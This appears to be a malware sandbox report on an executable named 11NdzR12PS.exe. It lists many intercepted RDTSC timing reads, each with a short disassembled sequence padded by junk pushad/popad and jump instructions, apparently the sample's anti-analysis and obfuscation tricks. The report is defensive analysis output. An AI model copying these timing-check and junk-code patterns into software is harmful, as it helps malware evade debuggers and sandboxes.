Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F870F7 second address: F87106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B871 second address: F8B875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B875 second address: F8B881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B881 second address: F8B886 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B886 second address: F8B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810308h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B8A9 second address: F8B8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FF34080AB15h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8BA4A second address: F8BA5C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF3408102F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF3408102F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C25A second address: F8C25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C25E second address: F8C28A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 jmp 00007FF340810306h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C43C second address: F8C455 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB0Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C455 second address: F8C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C708 second address: F8C716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF34080AB06h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F39077 second address: F3909A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF340810302h 0x0000000c jmp 00007FF3408102FCh 0x00000011 popad 0x00000012 jnp 00007FF34081031Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F3909A second address: F3909E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0D299 second address: F0D29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0D29D second address: F0D2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0D2B1 second address: F0D2B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8CB2C second address: F8CB3F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF34080AB08h 0x00000008 pushad 0x00000009 jnp 00007FF34080AB06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93169 second address: F9316D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9316D second address: F93181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF34080AB0Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F92958 second address: F9295C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9295C second address: F92965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F92965 second address: F9296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F936E4 second address: F93712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FF34080AB19h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93712 second address: F93716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93837 second address: F93849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93849 second address: F9384E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F986F1 second address: F986FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E344 second address: F38539 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FF340810308h 0x00000013 call 00007FF3408102FBh 0x00000018 mov edx, dword ptr [ebp+122D2C86h] 0x0000001e pop edx 0x0000001f pop ecx 0x00000020 lea eax, dword ptr [ebp+12493071h] 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 jmp 00007FF3408102FDh 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b pop edi 0x0000004c mov dword ptr [esp], eax 0x0000004f xor dword ptr [ebp+122D3552h], esi 0x00000055 call dword ptr [ebp+122D1CC0h] 0x0000005b push eax 0x0000005c ja 00007FF340810325h 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 jmp 00007FF340810305h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E820 second address: F5E824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E824 second address: F5E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E8FE second address: F5E919 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF34080AB11h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E919 second address: F5E91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5EB76 second address: F5EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5EB7C second address: F5EBA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e movsx edi, si 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007FF3408102F6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5ED01 second address: F5ED0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5ED0B second address: F5ED0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5EE4D second address: F5EE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5F570 second address: F5F574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5F62F second address: F5F633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5F633 second address: F39077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF3408102F8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12493071h] 0x0000002a nop 0x0000002b jmp 00007FF340810301h 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007FF3408102FCh 0x00000038 jc 00007FF3408102F6h 0x0000003e pop edx 0x0000003f nop 0x00000040 jmp 00007FF340810306h 0x00000045 call dword ptr [ebp+122D1C2Bh] 0x0000004b pushad 0x0000004c jmp 00007FF3408102FDh 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B34 second address: F97B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B3A second address: F97B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B42 second address: F97B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF34080AB06h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B53 second address: F97B71 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3408102F6h 0x00000008 jo 00007FF3408102F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FF340810302h 0x00000016 jnc 00007FF3408102F6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97CBA second address: F97CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97CCC second address: F97CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97CD2 second address: F97CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF34080AB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F98127 second address: F98144 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF3408102FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F98144 second address: F9814A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F982AB second address: F982AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F982AF second address: F982C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF34080AB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F982C8 second address: F982E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF340810301h 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9C0AF second address: F9C0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9C0B8 second address: F9C0CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF3408102FCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9C0CD second address: F9C0D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA010E second address: FA0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA0112 second address: FA011B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F1C3D1 second address: F1C3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF3408102FEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F1C3F4 second address: F1C3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9FBB9 second address: F9FBC3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3408102FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9FBC3 second address: F9FBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9FBD3 second address: F9FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA27E6 second address: FA2806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA233D second address: FA2360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF340810308h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA2360 second address: FA236E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007FF34080AB06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA682B second address: FA684A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA684A second address: FA6850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA6850 second address: FA6884 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 jmp 00007FF340810309h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FF3408102FEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F08384 second address: F0838C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA5F99 second address: FA5F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA6108 second address: FA615B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB1Dh 0x0000000a jmp 00007FF34080AB17h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007FF34080AB06h 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF34080AB13h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA62BC second address: FA62C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA62C0 second address: FA62DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Bh 0x00000007 jng 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jl 00007FF34080AB0Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC65 second address: FABC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC6B second address: FABC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC6F second address: FABC91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 jmp 00007FF340810308h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC91 second address: FABC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC9C second address: FABD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3408102F6h 0x0000000a jmp 00007FF3408102FAh 0x0000000f popad 0x00000010 jnc 00007FF34081030Fh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jp 00007FF3408102F6h 0x00000021 jmp 00007FF340810309h 0x00000026 jmp 00007FF3408102FEh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABECD second address: FABED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC04A second address: FAC04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC04F second address: FAC057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2DC second address: FAC2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2E0 second address: FAC2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2E4 second address: FAC2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2EF second address: FAC2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC5AB second address: FAC5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB1243 second address: FB124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB124D second address: FB125D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF3408102F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB06B1 second address: FB06BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
